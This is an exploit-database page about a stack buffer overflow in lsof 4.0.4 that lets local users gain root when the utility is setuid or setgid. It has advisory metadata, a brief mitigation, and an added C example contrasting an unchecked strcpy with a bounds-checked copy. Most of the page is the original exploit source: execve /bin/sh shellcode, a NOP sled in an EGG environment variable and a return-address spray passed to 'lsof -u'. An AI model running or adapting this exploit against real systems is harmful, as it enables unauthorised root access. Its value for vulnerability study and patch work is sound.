Buffer Overflow in Lsof Utility - exploit.company
Vendor: Lsof
By: Zhodiac
CVSS: 7.5 (HIGH)
Type: Buffer Overflow
CWE: 121
Product Name: Lsof
Affected Version From: Lsof 4.0.4
Affected Version To: Lsof 4.0.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux

Buffer Overflow in Lsof Utility

This is an exploit for a buffer overflow in the Lsof utility. When the utility is run with root privileges, the overflow can allow regular users to gain root privileges.

Mitigation:

Update Lsof to a version that has fixed the buffer overflow vulnerability.
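
What a fix for this class of bug looks like, as an added example that is not lsof's source and not part of the original advisory: an unchecked copy of a `-u` style user list into a fixed stack buffer, beside a form that measures each name before copying. The function names and the `LOGIN_MAX` capacity are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define LOGIN_MAX 32  /* assumed capacity for one login name, not lsof's real value */

/* Vulnerable pattern (CWE-121): copies an argument of any length into a
 * fixed stack buffer with no length check. Shown for contrast, never called. */
int count_users_unsafe(const char *arg) {
    char name[LOGIN_MAX];
    strcpy(name, arg);               /* overflows when strlen(arg) >= LOGIN_MAX */
    return name[0] != '\0';
}

/* Hardened form: walk the comma-separated list and measure each token
 * before copying it. Returns the number of names, or -1 if any token is
 * empty or would not fit in the buffer. */
int count_users_checked(const char *arg) {
    char name[LOGIN_MAX];
    int count = 0;
    const char *p = arg;

    if (arg == NULL || *arg == '\0')
        return -1;
    for (;;) {
        size_t len = strcspn(p, ",");        /* length of this token */
        if (len == 0 || len >= sizeof(name))
            return -1;                        /* reject instead of truncating */
        memcpy(name, p, len);
        name[len] = '\0';
        count++;
        if (p[len] == '\0')
            break;
        p += len + 1;                         /* skip the comma */
    }
    return count;
}

int main(void) {
    char longarg[256];
    memset(longarg, 'A', sizeof(longarg) - 1);   /* constructed over-long input */
    longarg[sizeof(longarg) - 1] = '\0';
    printf("root,daemon -> %d\n", count_users_checked("root,daemon"));
    printf("255 x 'A'   -> %d\n", count_users_checked(longarg));
    return 0;
}
```

Rejecting the over-long name outright, rather than truncating it, keeps a setuid or setgid program from acting on input it did not fully validate.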

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/496/info
 
Lsof is an open file management utility included with many Linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root privileges.

/* http://www.hackersnetwork.net! */

/*
 *  Xploit for lsof 4.0.4 by Zhodiac <zhodiac@usa.net>
 *  Based on Aleph's article in phrack49
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE             32
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;
  char comando[512];

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  printf("\nXploit for lsof 4.04 by zhodiac <zhodiac@usa.net>\n\n");

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  snprintf(comando,511,"lsof -u %s",buff);
  system(comando);
}